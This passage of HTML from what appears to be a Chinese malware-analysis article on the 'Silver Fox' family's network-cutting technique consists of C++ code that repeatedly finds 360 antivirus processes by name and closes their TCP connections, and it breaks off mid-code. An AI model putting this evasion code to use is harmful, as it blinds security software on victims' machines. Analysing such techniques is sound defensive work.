Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> wmain</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argc, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wchar_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> argv</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[])</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">LoadNtFunctions</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">();</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Tray.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360Safe.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;LiveUpdate360.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;safesvr.exe&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;360leakfixer.exe&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[*] Starting connection monitor...</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">true</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">auto</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> procName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> targetProcs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">procName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: 